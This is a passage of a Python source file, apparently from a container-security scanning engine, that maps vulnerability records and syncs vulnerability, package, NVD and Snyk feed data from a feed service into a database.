'https://security-tracker.debian.org/tracker/DSA-0000-0'\n }\n ]\n }\n }\n ],\n 'Link': 'https://security-tracker.debian.org/tracker/CVE-2013-7397',\n 'Metadata': {\n 'NVD': {\n 'CVSSv2': {\n 'Score': 4.3,\n 'Vectors': u'AV:N/AC:M/Au:N/C:N/I:P'\n }\n }\n },\n 'Name': 'CVE-2013-7397',\n 'NamespaceName': 'debian:9',\n 'Severity': 'Medium'}\n }\n \"\"\"\n defaults = {\n 'Severity': 'Unknown',\n 'Link': None,\n 'Description': None\n }\n\n MAX_STR_LEN = 1024 * 64 - 4\n\n def map(self, record_json):\n if not record_json:\n return None\n\n # Handle a 'Vulnerability' wrapper around the specific record. If not present, assume a direct record\n if len(list(record_json.keys())) == 1 and record_json.get('Vulnerability'):\n vuln = record_json['Vulnerability']\n else:\n vuln = record_json\n\n db_rec = Vulnerability()\n db_rec.id = vuln['Name']\n db_rec.namespace_name = self.group\n db_rec.severity = vuln.get('Severity', 'Unknown')\n db_rec.link = vuln.get('Link')\n description = vuln.get(\"Description\", \"\")\n if description:\n db_rec.description = vuln.get('Description','') if len(vuln.get('Description','')) < self.MAX_STR_LEN else (vuln.get('Description')[:self.MAX_STR_LEN - 8] + '...')\n else:\n db_rec.description = \"\"\n db_rec.fixed_in = []\n #db_rec.vulnerable_in = []\n\n #db_rec.metadata_json = json.dumps(vuln.get('Metadata')) if 'Metadata' in vuln else None\n db_rec.additional_metadata = vuln.get('Metadata', {})\n cvss_data = vuln.get('Metadata', {}).get('NVD', {}).get('CVSSv2')\n if cvss_data:\n db_rec.cvss2_vectors = cvss_data.get('Vectors')\n db_rec.cvss2_score = cvss_data.get('Score')\n\n # Process Fixes\n if 'FixedIn' in vuln:\n for f in vuln['FixedIn']:\n fix = FixedArtifact()\n fix.name = f['Name']\n fix.version = f['Version']\n fix.version_format = f['VersionFormat']\n fix.epochless_version = re.sub(r'^[0-9]*:', '', f['Version'])\n fix.vulnerability_id = db_rec.id\n fix.namespace_name = self.group\n fix.vendor_no_advisory = f.get('VendorAdvisory', {}).get('NoAdvisory', False)\n fix.fix_metadata = {'VendorAdvisorySummary': f['VendorAdvisory']['AdvisorySummary']} if f.get('VendorAdvisory', {}).get('AdvisorySummary', []) else None\n\n db_rec.fixed_in.append(fix)\n\n# if 'VulnerableIn' in vuln:\n# for v in vuln['VulnerableIn']:\n# v_in = VulnerableArtifact()\n# v_in.name = v['Name']\n# v_in.version = v['Version']\n# v_in.version_format = v['VersionFormat']\n# v_in.epochless_version = re.sub(r'^[0-9]*:', '', v['Version'])\n# v_in.vulnerability_id = db_rec.id\n# v_in.namespace_name = self.group\n#\n# db_rec.vulnerable_in.append(v_in)\n\n return db_rec\n\n\nclass IFeedSource(object):\n \"\"\"\n Base interface for a feed source\n \"\"\"\n\n def list_feeds(self):\n raise NotImplementedError()\n\n def list_feed_groups(self, feed):\n raise NotImplementedError()\n\n def get_feed_group_data(self, feed, group, since=None):\n \"\"\"\n Get data, optionally newer than a specific date. Returns *all* data, for a paged\n approach use the get_paged_feed_group_data function.\n\n :param feed: str feed name\n :param group: str group name\n :param since: datetime object indicating earliest date to fetch data from\n :return:\n \"\"\"\n raise NotImplementedError()\n\n def get_paged_feed_group_data(self, feed, group, since=None, next_token=None):\n \"\"\"\n Get a max_sized page of data using the continuation token.\n\n :param feed:\n :param group:\n :param since:\n :return:\n \"\"\"\n raise NotImplementedError()\n\n\nclass AnchoreFeedServiceClient(IFeedSource):\n \"\"\"\n Simple passthru to the Feeds client to consistently implement the interface\n \n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initializes a default anchore.io service client, but can be overridden by the backing_client argument and will wrap that instead if provided\n :param backing_client:\n \"\"\"\n self._client = None\n\n @property\n def client(self):\n if not self._client:\n self._client = get_feeds_client()\n return self._client\n\n def list_feed_groups(self, feed):\n resp = self.client.list_feed_groups(feed)\n groups = resp.groups\n return groups\n\n def list_feeds(self):\n feed_listing = self.client.list_feeds()\n return feed_listing.feeds\n\n def get_paged_feed_group_data(self, feed, group, since=None, next_token=None):\n # if type(since) == datetime.datetime:\n # since = since.strftime(SINCE_DATE_FORMAT)\n\n if next_token:\n if since:\n resp = self.client.get_feed_group_data(feed, group, since=since, next_token=next_token)\n else:\n resp = self.client.get_feed_group_data(feed, group, next_token=next_token)\n else:\n if since:\n resp = self.client.get_feed_group_data(feed, group, since=since)\n else:\n resp = self.client.get_feed_group_data(feed, group)\n\n if next_token and resp.next_token and next_token == resp.next_token:\n raise Exception('Service returned same next token as requested, cannot proceed safely. Aborting fetch')\n\n log.debug('Got data len: {}, token: {}'.format(len(resp.data), resp.next_token))\n return resp.data, resp.next_token\n\n def get_feed_group_data(self, feed, group, since=None):\n # if type(since) == datetime.datetime:\n # since = since.strftime(SINCE_DATE_FORMAT)\n\n next_token = None\n more_data = True\n data = []\n while more_data:\n log.debug('Fetching data, token = {}'.format(next_token))\n\n if next_token:\n if since:\n resp = self.client.get_feed_group_data(feed, group, since=since, next_token=next_token)\n else:\n resp = self.client.get_feed_group_data(feed, group, next_token=next_token)\n else:\n if since:\n resp = self.client.get_feed_group_data(feed, group, since=since)\n else:\n resp = self.client.get_feed_group_data(feed, group)\n\n data += resp.data\n if next_token and resp.next_token and next_token == resp.next_token:\n raise Exception('Service returned same next token as requested, cannot proceed safely. Aborting fetch')\n\n next_token = resp.next_token\n more_data = bool(next_token)\n log.debug('Got: {} records, token = {}'.format(len(resp.data), next_token))\n\n return data\n\n\nclass DataFeed(object):\n \"\"\"\n Interface for a data feed. A DataFeed is a combination of a means to connect to the feed, metadata about the feed actions\n locally, and mapping data ingesting the feed data itself.\n \n \"\"\"\n\n __source_cls__ = None # A class definition that implements IFeedSource\n __feed_name__ = None\n __should_sync__ = None\n __group_data_mappers__ = None # A dict/map of group names to mapper objects for translating group data into db types\n\n def __init__(self, metadata=None, src=None):\n \"\"\"\n Instantiates any necessary clients and makes the feed ready to use\n :param metadata: an existing metadata record if available for bootstrapping\n :param src: an object to use as the feed source. if not provided then the class's __source_cls__ definition is used\n \"\"\"\n\n self.source = self.__source_cls__() if not src else src\n self.metadata = metadata\n\n def sync(self, group=None, item_processing_fn=None, full_flush=False, flush_helper_fn=None):\n \"\"\"\n Ensure the feed is synchronized. Performs checks per sync item and if item_processing_fn is provided.\n Transaction scope is the update for an entire group.\n\n item_processing_fn is exepected to be a function that can consume a db session but should *NOT* commit or rollback the session. The caller will handle that to properly maintain\n session scope to each item to be updated.\n\n :param group: the group name to update if only a single group update is required\n :param item_processign_fn: A function with first param the db session and second param the updated item, which is called on each updated item within the update transaction scope\n :param full_flush: Remove any old data from the feed and replace with new sync data\n :param flush_helper_fn: Function to invoke during each group's data flush process\n :return: list of updated records added to the database\n \"\"\"\n raise NotImplementedError()\n\n def bulk_sync(self, group=None):\n \"\"\"\n Similar to sync, but uses bulk operations and is therefore more prone to failure due to things like data conflicts.\n\n This is intended for large initial syncs or operations where conflicts and updates are less likely than a large\n volume of inserts.\n\n :param group: the group name to update if only one is desired. If not provided then all groups are updated\n :return: dict of group:record_count_inserted\n \"\"\"\n raise NotImplementedError()\n\n\nclass AnchoreServiceFeed(DataFeed):\n \"\"\"\n A data feed provided by the Anchore Feeds service.\n\n Metadata persisted in the backing db.\n Instance load will fire a load from the db to get the latest metadata in db, and sync\n operations will sync data and metadata from the upstream service.\n \"\"\"\n\n __source_cls__ = AnchoreFeedServiceClient\n __group_data_mappers__ = GenericFeedDataMapper\n\n MAX_FEED_SYNC_PAGES = 4 # Number of pages of data (~5mb each) to process at a time during feed sync to keep memory usage reasonable\n\n def __init__(self, metadata=None, src=None):\n if not metadata:\n db = get_session()\n metadata = db.query(FeedMetadata).get(self.__feed_name__)\n\n super(AnchoreServiceFeed, self).__init__(metadata=metadata, src=src)\n\n def never_synced(self):\n \"\"\"\n Returns true if this feed has never been successfully synced. Essentially checks the last_full_sync timestamp for existence.\n :return: boolean\n \"\"\"\n is_not_synced = not self.metadata or not self.metadata.last_full_sync\n log.debug('Feed {} has never been synced? {}'.format(self.__feed_name__, is_not_synced))\n return is_not_synced\n\n def _sync_meta(self):\n \"\"\"\n Ensure feed metadata is up-to-date in the db\n :return:\n \"\"\"\n\n # Refresh data from the db if available\n session = get_session()\n\n if not self.metadata:\n meta_record = session.query(FeedMetadata).get(self.__feed_name__)\n if meta_record:\n self.metadata = meta_record\n\n my_feed = [x for x in self.source.list_feeds() if x.name == self.__feed_name__]\n if not my_feed:\n raise Exception('No feed with name {} found on feed source'.format(self.__feed_name__))\n else:\n my_feed = my_feed[0]\n\n if not self.metadata:\n self.metadata = FeedMetadata(name=my_feed.name, description=my_feed.description, access_tier=my_feed.access_tier)\n session.add(self.metadata)\n else:\n self.metadata.description = my_feed.description\n self.metadata.access_tier = my_feed.access_tier\n session.add(self.metadata)\n\n def record_count(self, group_name):\n raise NotImplementedError()\n\n def _get_data(self, group_name, since=None):\n \"\"\"\n Returns a generator to iterate thru data returned by the source\n \n :param group_name: \n :param since: \n :return: \n \"\"\"\n\n if since:\n # if type(since) == datetime.datetime:\n # since = since.strftime(SINCE_DATE_FORMAT)\n data = self.source.get_feed_group_data(self.__feed_name__, group_name, since=since)\n else:\n data = self.source.get_feed_group_data(self.__feed_name__, group_name)\n\n return data\n\n def _load_mapper(self, group_obj):\n \"\"\"\n Find and instantiate the right mapper object for the given group.\n\n :param group_obj:\n :return:\n \"\"\"\n if not hasattr(self.__class__.__group_data_mappers__, 'get'):\n mapper = self.__class__.__group_data_mappers__\n else:\n mapper = self.__class__.__group_data_mappers__.get(group_obj.name)\n\n if not mapper:\n raise Exception('No mapper class found for group: {}'.format(group_obj.name))\n\n # If it's a class, instantiate it\n if type(mapper) == type:\n mapper = mapper(self.__feed_name__, group_obj.name, keyname=None)\n\n return mapper\n\n\n # TODO: context manager for syncs to facilitate simple state management.\n # On enter, create record and state = 'running', on exit, set completion state and commit transaction\n # class SyncContext(object):\n # def __init__(self, feed=None, group=None):\n # log.debug('Beginning sync context')\n # self.sync_record = None\n # self.feed = feed\n # self.group = group\n # self.session = None\n #\n # def __enter__(self):\n # db = get_session()\n # try:\n # self.sync_record = SyncHistory(feed=self.feed, group=self.group)\n # db.add(self.sync_record)\n # db.commit()\n # except:\n # db.rollback()\n # raise\n #\n # self.session = get_session()\n #\n # def __exit__(self, exc_type, exc_val, exc_tb):\n # try:\n # self.session.refresh(self.sync_record)\n # if exc_val:\n # self.sync_record.state = 'failed'\n # else:\n # self.sync_record.state = 'complete'\n #\n # self.sync_record.terminated_at = datetime.datetime.utcnow()\n # self.session.add(self.sync_record)\n # self.session.commit()\n # except:\n # log.exception('Exception committing sync state, rolling back')\n # self.session.rollback()\n # raise\n #\n # def _dedup_data(self, new_data_items):\n # return new_data_items\n\n def _dedup_data_key(self, item):\n \"\"\"\n Return the key value to uniquely identify the item\n :param item:\n :return:\n \"\"\"\n return item.__hash__()\n\n def _get_deduped_data(self, group_obj, since=None, next_token=None, max_pages=None):\n \"\"\"\n Fetch data and deduplicate items in-line. Still requires buffering of entire data set in memory,\n but only the deduped data set, so usage is minimal.\n\n Returns mapped objects, not raw json dicts. Objects mapped using the class's defined mapper\n\n :param group_obj:\n :return:\n \"\"\"\n mapper = self._load_mapper(group_obj)\n new_data = True\n pages = 0\n new_data_deduped = {} # Dedup by item key\n while (new_data or next_token) and (max_pages is None or pages <= max_pages):\n new_data, next_token = self.source.get_paged_feed_group_data(self.__feed_name__, group_obj.name,\n since=since,\n next_token=next_token)\n pages += 1\n for x in new_data:\n mapped = mapper.map(x)\n if mapped:\n new_data_deduped[self._dedup_data_key(mapped)] = mapped\n\n new_data = None\n log.debug('Page = {}, new_data = {}, next_token = {}'.format(pages, bool(new_data), bool(next_token), max_pages))\n\n data = list(new_data_deduped.values())\n new_data_deduped = None\n return data, next_token\n\n def _bulk_sync_group(self, group_obj):\n \"\"\"\n Performs a bulk sync of a single group.\n\n :param group_obj:\n :return: number of records inserted\n \"\"\"\n\n fetch_time = time.time()\n new_data_deduped, next_token = self._get_deduped_data(group_obj)\n fetch_time = time.time() - fetch_time\n log.info('Group data fetch took {} sec'.format(fetch_time))\n\n log.info('Adding {} records from group {}'.format(len(new_data_deduped), group_obj.name))\n db_time = time.time()\n db = get_session()\n try:\n for i in new_data_deduped:\n db.add(i)\n\n # Data complete, update the timestamp\n group_obj.last_sync = datetime.datetime.utcnow()\n db.add(group_obj)\n db.commit()\n return len(new_data_deduped)\n except Exception as e:\n log.exception('Error syncing group: {}'.format(group_obj))\n db.rollback()\n raise\n finally:\n db_time = time.time() - db_time\n log.info('Sync db time took {} sec'.format(db_time))\n\n def _sync_group(self, group_obj, full_flush=False):\n \"\"\"\n Sync data from a single group and return the data. This operation is scoped to a transaction on the db.\n\n :param group_obj:\n :return:\n \"\"\"\n sync_time = time.time()\n total_updated_count = 0\n result = build_group_sync_result()\n result['group'] = group_obj.name\n\n db = get_session()\n if full_flush:\n last_sync = None\n else:\n last_sync = group_obj.last_sync\n\n try:\n next_token = ''\n while next_token is not None:\n if next_token == '':\n next_token = None\n fetch_time = time.time()\n\n new_data_deduped, next_token = self._get_deduped_data(group_obj, since=last_sync, next_token=next_token, max_pages=self.MAX_FEED_SYNC_PAGES)\n fetch_time = time.time() - fetch_time\n log.info('Group data fetch took {} sec'.format(fetch_time))\n log.info('Merging {} records from group {}'.format(len(new_data_deduped), group_obj.name))\n db_time = time.time()\n\n for rec in new_data_deduped:\n merged = db.merge(rec)\n #db.add(merged)\n db.flush()\n log.info('Db merge took {} sec'.format(time.time() - db_time))\n total_updated_count += len(new_data_deduped)\n\n group_obj.last_sync = datetime.datetime.utcnow()\n db.add(group_obj)\n db.commit()\n except Exception as e:\n log.exception('Error syncing group: {}'.format(group_obj))\n db.rollback()\n raise\n finally:\n sync_time = time.time() - sync_time\n log.info('Syncing group took {} sec'.format(sync_time))\n\n result['updated_record_count'] = total_updated_count\n result['status'] = 'success'\n result['total_time_seconds'] = sync_time\n result['updated_image_count'] = 0\n return result\n\n def _flush_group(self, group_obj, flush_helper_fn=None):\n \"\"\"\n Flush a specific data group. Do a db flush, but not a commit at the end to keep the transaction open.\n\n :param group_obj:\n :param flush_helper_fn:\n :return:\n \"\"\"\n\n db = get_session()\n\n if flush_helper_fn:\n flush_helper_fn(db=db, feed_name=group_obj.feed_name, group_name=group_obj.name)\n\n db.query(GenericFeedDataRecord).delete()\n\n def bulk_sync(self, group=None):\n \"\"\"\n Performs a bulk sync of one or all groups, which does not do any merges or assume any data is extant to conflict.\n Will also not perform any per-record updates to the rest of the system.\n\n This is intended as a function for use on the very first sync operation when no other data is yet in the system.\n\n :param group: str name of group to sync, if None then all groups are synced\n :return: map of group:record_count for insertions\n \"\"\"\n\n self.init_feed_meta_and_groups()\n\n updated_records = {}\n\n # Each group update is a unique session and can roll itself back.\n for g in self.metadata.groups:\n log.info('Processing group for bulk sync: {}'.format(g.name))\n if not group or g.name == group:\n try:\n inserted_count = self._bulk_sync_group(g)\n updated_records[g.name] = inserted_count\n except Exception as e:\n log.exception('Failed bulk syncing group data for {}/{}'.format(self.__feed_name__, g.name))\n raise e\n else:\n log.info('Group not selected for bulk sync: {}. Skipping.'.format(g.name))\n\n self._update_last_sync_timestamp()\n return updated_records\n\n def _update_last_sync_timestamp(self, db=None, update_time=None):\n \"\"\"\n Update the last sync timestamp with the current time or the time provided\n :return:\n \"\"\"\n db_session = db if db else get_session()\n\n try:\n # Update timestamps\n self.metadata.last_update = update_time if update_time else datetime.datetime.utcnow()\n self.metadata.last_full_sync = self.metadata.last_update\n db_session.add(db_session.merge(self.metadata))\n\n # Only commit/rollback if no session was provided\n if not db:\n db_session.commit()\n except Exception as e:\n log.exception('Failed updating feed metadata timestamps.')\n # Don't modify session state if it was provided in call\n if not db:\n db_session.rollback()\n raise\n\n def init_feed_meta_and_groups(self):\n db = get_session()\n try:\n log.debug('Refreshing groups')\n self._sync_meta()\n self.refresh_groups()\n db.add(self.metadata)\n db.commit()\n except (InsufficientAccessTierError, InvalidCredentialsError):\n raise\n except Exception as e:\n db.rollback()\n raise\n\n def sync(self, group=None, item_processing_fn=None, full_flush=False, flush_helper_fn=None):\n \"\"\"\n Sync data with the feed source. This may be *very* slow if there are lots of updates.\n\n Returns a dict with the following structure:\n {\n 'group_name': [ record1, record2, ..., recordN],\n 'group_name2': [ record1, record2, ...., recordM],\n ...\n }\n\n :param: group: The group to sync, optionally. If not specified, all groups are synced.\n :return: changed data updated in the sync as a list of records \n \"\"\"\n\n self.init_feed_meta_and_groups()\n\n result = build_feed_sync_results()\n result['status'] = 'failure'\n result['feed'] = self.__feed_name__\n\n failed_count = 0\n\n # Each group update is a unique session and can roll itself back.\n t = time.time()\n for g in self.metadata.groups:\n log.info('Processing group: {}'.format(g.name))\n if not group or g.name == group:\n if full_flush:\n log.info('Performing group data flush prior to sync')\n self._flush_group(g, flush_helper_fn)\n\n try:\n new_data = self._sync_group(g, full_flush=full_flush) # Each group sync is a transaction\n result['groups'].append(new_data)\n except Exception as e:\n log.exception('Failed syncing group data for {}/{}'.format(self.__feed_name__, g.name))\n failed_count += 1\n else:\n log.info('Skipping group {} since not selected'.format(g))\n\n sync_time = time.time() - t\n db = get_session()\n try:\n # Update timestamps\n self.metadata.last_update = datetime.datetime.utcnow()\n self.metadata.last_full_sync = self.metadata.last_update\n db.add(db.merge(self.metadata))\n db.commit()\n except Exception as e:\n log.exception('Failed updating feed metadata timestamps.')\n db.rollback()\n raise\n\n result['total_time_seconds'] = sync_time\n result['status'] = 'success' if failed_count == 0 else 'failure'\n return result\n\n def group_by_name(self, group_name):\n return [x for x in self.metadata.groups if x.name == group_name] if self.metadata else []\n\n def refresh_groups(self):\n group_list = self.source.list_feed_groups(self.__feed_name__)\n\n for group in group_list:\n my_group = self.group_by_name(group.name)\n if not my_group:\n g = FeedGroupMetadata(name=group.name, description=group.description, access_tier=group.access_tier, feed=self.metadata)\n g.last_sync = None\n\n\nclass VulnerabilityFeed(AnchoreServiceFeed):\n \"\"\"\n Vulnerabilities feed from anchore feed service backend. Unique in that the records are nested and have structure.\n Each vulnerability record maps to a set of records in the DB: one for the vulnerability and a set for each of the FixedIn and\n VulnerableIn collections that are optionally present for the vulnerability main record.\n\n \"\"\"\n\n __feed_name__ = 'vulnerabilities'\n _cve_key = 'Name'\n __group_data_mappers__ = SingleTypeMapperFactory(__feed_name__, VulnerabilityFeedDataMapper, _cve_key)\n\n def query_by_key(self, key, group=None):\n if not group:\n raise ValueError('Group must be specified since it is part of the key for vulnerabilities')\n\n db = get_session()\n try:\n return db.query(Vulnerability).get((key, group))\n except Exception as e:\n log.exception('Could not retrieve vulnerability by key:')\n\n def query_data_since(self, since_datetime, group=None):\n db = get_session()\n try:\n if not group:\n return db.query(Vulnerability).filter(Vulnerability.updated_at >= since_datetime).all()\n else:\n return db.query(Vulnerability).filter(Vulnerability.updated_at >= since_datetime, Vulnerability.namespace_name == group).all()\n except Exception as e:\n log.exception('Could not retrieve vulnerability by key:')\n\n def _dedup_data_key(self, item):\n return item.id\n\n def _sync_group(self, group_obj, vulnerability_processing_fn=None, full_flush=False):\n \"\"\"\n Sync data from a single group and return the data. The vulnerability_processing_fn callback is invoked for each item within the transaction scope.\n\n :param group_obj: the group object to sync\n :param bulk_load: should the load be done in bulk fashion, typically this is only for first run as it bypasses all per-item processing\n :return:\n \"\"\"\n sync_time = time.time()\n result = build_group_sync_result()\n result['status'] = 'failure'\n result['group'] = group_obj.name\n\n db = get_session()\n\n if full_flush:\n last_sync = None\n else:\n last_sync = group_obj.last_sync\n\n total_updated_count = 0\n updated_images = set()\n try:\n next_token = ''\n while next_token is not None:\n if next_token == '':\n next_token = None\n fetch_time = time.time()\n new_data_deduped, next_token = self._get_deduped_data(group_obj, since=last_sync, next_token=next_token, max_pages=self.MAX_FEED_SYNC_PAGES)\n fetch_time = time.time() - fetch_time\n log.debug('Group data fetch took {} sec'.format(fetch_time))\n log.debug('Merging {} records from group {}'.format(len(new_data_deduped), group_obj.name))\n total_updated_count += len(new_data_deduped)\n\n db_time = time.time()\n for rec in new_data_deduped:\n # Make any updates and changes within this single transaction scope\n updated_image_ids = self.update_vulnerability(db, rec, vulnerability_processing_fn=vulnerability_processing_fn)\n updated_images = updated_images.union(set(updated_image_ids)) # Record after commit to ensure in-sync.\n db.flush()\n log.debug('Db merge took {} sec'.format(time.time() - db_time))\n\n group_obj.last_sync = datetime.datetime.utcnow()\n db.add(group_obj)\n db.commit()\n except Exception as e:\n log.exception('Error syncing group: {}'.format(group_obj))\n db.rollback()\n raise\n finally:\n sync_time = time.time() - sync_time\n log.info('Syncing group took {} sec'.format(sync_time))\n\n result['total_time_seconds'] = sync_time\n result['status'] = 'success'\n result['updated_image_count'] = len(list(updated_images))\n result['updated_record_count'] = total_updated_count\n return result\n\n @staticmethod\n def _are_match_equivalent(vulnerability_a, vulnerability_b):\n \"\"\"\n Returns true if the two records (including child fixedin and/or vulnerablein records) are equivalent in terms of package matching.\n\n TODO: move this logic to an vuln-scan abstraction, but that abstraction needs more work before it's ready. Would like to keep the definition of what impacts matches centralized so as not to get out-of-sync.\n\n :param vulnerability_a:\n :param vulnerability_b:\n :return:\n \"\"\"\n\n if not (vulnerability_a and vulnerability_b) or vulnerability_a.id != vulnerability_b.id or vulnerability_a.namespace_name != vulnerability_b.namespace_name:\n # They aren't the same item reference\n log.debug('Vuln id or namespaces are different: {} {} {} {}'.format(vulnerability_a.id, vulnerability_b.id, vulnerability_a.namespace_name, vulnerability_b.namespace_name))\n return False\n\n normalized_fixes_a = {(fix.name, fix.epochless_version, fix.version) for fix in vulnerability_a.fixed_in}\n normalized_fixes_b = {(fix.name, fix.epochless_version, fix.version) for fix in vulnerability_b.fixed_in}\n\n fix_diff = normalized_fixes_a.symmetric_difference(normalized_fixes_b)\n if fix_diff:\n log.debug('Fixed In records diff: {}'.format(fix_diff))\n return False\n\n #normalized_vulnin_a = {(vuln.name, vuln.epochless_version, vuln.version) for vuln in vulnerability_a.vulnerable_in}\n #normalized_vulnin_b = {(vuln.name, vuln.epochless_version, vuln.version) for vuln in vulnerability_b.vulnerable_in}\n\n #vulnin_diff = normalized_vulnin_a.symmetric_difference(normalized_vulnin_b)\n\n #if vulnin_diff:\n # log.debug('VulnIn records diff: {}'.format(vulnin_diff))\n # return False\n\n return True\n\n def update_vulnerability(self, db, vulnerability_record, vulnerability_processing_fn=None):\n \"\"\"\n Processes a single vulnerability record. Specifically for vulnerabilities:\n Checks and updates any fixed-in or vulnerable-in records and given the final state of the vulneraability,\n calls the item_callback function which is expected to do things like: update image vulnerability lists based\n on the new item.\n\n :param vulnerability_record: the record from the feed source to process and load into the db.\n :param vulnerability_processing_fn: a callback function to execute with the new date, but before any transaction commit\n :return:\n \"\"\"\n try:\n updates = []\n\n try:\n existing = db.query(Vulnerability).filter(Vulnerability.id == vulnerability_record.id, Vulnerability.namespace_name == vulnerability_record.namespace_name).one_or_none()\n except:\n log.debug('No current record found for {}'.format(vulnerability_record))\n existing = None\n\n if existing:\n needs_update = not VulnerabilityFeed._are_match_equivalent(existing, vulnerability_record)\n if needs_update:\n log.debug('Found update that requires an image match update from {} to {}'.format(existing, vulnerability_record))\n else:\n needs_update = True\n\n merged = db.merge(vulnerability_record)\n\n if vulnerability_processing_fn and needs_update:\n updates = vulnerability_processing_fn(db, merged)\n else:\n log.debug('Skipping image processing due to no diff: {}'.format(merged))\n\n return updates\n except Exception as e:\n log.exception('Error in vulnerability processing')\n raise e\n\n def _flush_group(self, group_obj, flush_helper_fn=None):\n db = get_session()\n flush_helper_fn(db=db, feed_name=group_obj.feed_name, group_name=group_obj.name)\n\n count = db.query(FixedArtifact).filter(FixedArtifact.namespace_name == group_obj.name).delete()\n log.info('Flushed {} fix records'.format(count))\n #count = db.query(VulnerableArtifact).filter(VulnerableArtifact.namespace_name == group_obj.name).delete()\n #log.info('Flushed {} vuln_in records'.format(count))\n count = db.query(Vulnerability).filter(Vulnerability.namespace_name == group_obj.name).delete()\n log.info('Flushed {} vulnerability records'.format(count))\n\n db.flush()\n\n def sync(self, group=None, item_processing_fn=None, full_flush=False, flush_helper_fn=None):\n \"\"\"\n Sync data with the feed source. This may be *very* slow if there are lots of updates.\n\n Returns a dict with the following structure:\n {\n 'group_name': [ record1, record2, ..., recordN],\n 'group_name2': [ record1, record2, ...., recordM],\n ...\n }\n\n :param: group: The group to sync, optionally. If not specified, all groups are synced.\n :return: changed data updated in the sync as a list of records\n \"\"\"\n\n self.init_feed_meta_and_groups()\n\n result = {\n 'feed': self.__feed_name__,\n 'status': 'sync_failed',\n 'total_time_seconds': -1,\n 'groups': []\n }\n\n groups_failed = 0\n\n # Setup the group name cache\n feed_list_cache.vuln_group_list = [x.name for x in self.metadata.groups]\n try:\n # Each group update is a unique session and can roll itself back.\n for g in self.metadata.groups:\n log.info('Processing group: {}'.format(g.name))\n if not group or g.name == group:\n if full_flush:\n log.info('Performing group data flush prior to sync')\n self._flush_group(g, flush_helper_fn)\n\n try:\n new_data = self._sync_group(g, vulnerability_processing_fn=item_processing_fn, full_flush=full_flush)\n #updated_records[g.name] = new_data\n result['groups'].append(new_data)\n except Exception as e:\n log.exception('Failed syncing group data for {}/{}'.format(self.__feed_name__, g.name))\n groups_failed += 1\n else:\n log.info('Group not selected for sync: {}. Skipping.'.format(g.name))\n\n self._update_last_sync_timestamp()\n if groups_failed > 0:\n result['status'] = 'failure'\n else:\n result['status'] = 'success'\n return result\n\n finally:\n feed_list_cache.vuln_group_list = None\n\n\n @staticmethod\n def cached_group_name_lookup(name):\n return name in feed_list_cache.vuln_group_list if feed_list_cache and hasattr(feed_list_cache, 'vuln_group_list') else False\n\n def record_count(self, group_name):\n db = get_session()\n try:\n return db.query(Vulnerability).filter(Vulnerability.namespace_name == group_name).count()\n except Exception as e:\n log.exception('Error getting feed data group record count in package feed for group: {}'.format(group_name))\n raise\n finally:\n db.rollback()\n\n\nclass PackagesFeed(AnchoreServiceFeed):\n \"\"\"\n Feed for package data, served from the anchore feed service backend\n \"\"\"\n\n __feed_name__ = 'packages'\n\n __group_data_mappers__ = {\n 'gem': GemPackageDataMapper,\n 'npm': NpmPackageDataMapper\n }\n\n def query_by_key(self, key, group=None):\n if not group:\n raise ValueError('Group must be specified since it is part of the key for vulnerabilities')\n\n db = get_session()\n if group == 'gem':\n try:\n return db.query(GemMetadata).get(key)\n except Exception as e:\n log.exception('Could not retrieve vulnerability by key:')\n raise\n elif group == 'npm':\n try:\n return db.query(NpmMetadata).get(key)\n except Exception as e:\n log.exception('Could not retrieve vulnerability by key:')\n raise\n else:\n return None\n\n def _dedup_data_key(self, item):\n return item.name\n\n def record_count(self, group_name):\n db = get_session()\n try:\n if group_name == 'npm':\n return db.query(NpmMetadata).count()\n elif group_name == 'gem':\n return db.query(GemMetadata).count()\n else:\n return 0\n except Exception as e:\n log.exception('Error getting feed data group record count in package feed for group: {}'.format(group_name))\n raise\n finally:\n db.rollback()\n\n def _flush_group(self, group_obj, flush_helper_fn=None):\n db = get_session()\n if flush_helper_fn:\n flush_helper_fn(db=db, feed_name=group_obj.feed_name, group_name=group_obj.name)\n\n if group_obj.name == 'npm':\n ent_cls = NpmMetadata\n elif group_obj.name == 'gem':\n ent_cls = GemMetadata\n else:\n log.info('Unknown group name {}. Nothing to flush'.format(group_obj.name))\n return\n\n count = db.query(ent_cls).delete()\n log.info('Flushed {} {} records'.format(count, group_obj.name))\n\n db.flush()\n\n\nclass NvdFeed(AnchoreServiceFeed):\n \"\"\"\n Feed for package data, served from the anchore feed service backend\n \"\"\"\n\n __feed_name__ = 'nvd'\n _cve_key = '@id'\n __group_data_mappers__ = SingleTypeMapperFactory(__feed_name__, NvdFeedDataMapper, _cve_key)\n\n def query_by_key(self, key, group=None):\n if not group:\n raise ValueError('Group must be specified since it is part of the key for vulnerabilities')\n\n db = get_session()\n try:\n return db.query(NvdMetadata).get((key, group))\n except Exception as e:\n log.exception('Could not retrieve nvd vulnerability by key:')\n\n def _flush_group(self, group_obj, flush_helper_fn=None):\n\n db = get_session()\n if flush_helper_fn:\n flush_helper_fn(db=db, feed_name=group_obj.feed_name, group_name=group_obj.name)\n\n count = db.query(CpeVulnerability).filter(CpeVulnerability.namespace_name == group_obj.name).delete()\n log.info('Flushed {} CpeVuln records'.format(count))\n count = db.query(NvdMetadata).filter(NvdMetadata.namespace_name == group_obj.name).delete()\n log.info('Flushed {} Nvd records'.format(count))\n\n db.flush()\n\n def _dedup_data_key(self, item):\n return item.name\n\n def record_count(self, group_name):\n db = get_session()\n try:\n if 'nvddb' in group_name:\n return db.query(NvdMetadata).filter(NvdMetadata.namespace_name == group_name).count()\n else:\n return 0\n except Exception as e:\n log.exception('Error getting feed data group record count in package feed for group: {}'.format(group_name))\n raise\n finally:\n db.rollback()\n\n\nclass SnykFeed(VulnerabilityFeed):\n \"\"\"\n Feed for package data, served from the anchore feed service backend\n \"\"\"\n\n __feed_name__ = 'snyk'\n _cve_key = 'id'\n __group_data_mappers__ = SingleTypeMapperFactory(__feed_name__, SnykFeedDataMapper, _cve_key)\n\n# def query_by_key(self, key, group=None):\n# if not group:\n# raise ValueError('Group must be specified since it is part of the key for vulnerabilities')\n# db = get_session()\n# try:\n# return db.query(Vulnerability).get((key, group))\n# except Exception as e:\n# log.exception('Could not retrieve snyk vulnerability by key:')\n\n# def _dedup_data_key(self, item):\n# return item.id\n\n def record_count(self, group_name):\n db = get_session()\n try:\n if 'snyk' in group_name:\n return db.query(Vulnerability).filter(Vulnerability.namespace_name == group_name).count()\n else:\n return 0\n except Exception as e:\n log.exception('Error getting feed data group record count in package feed for group: {}'.format(group_name))\n raise\n finally:\n 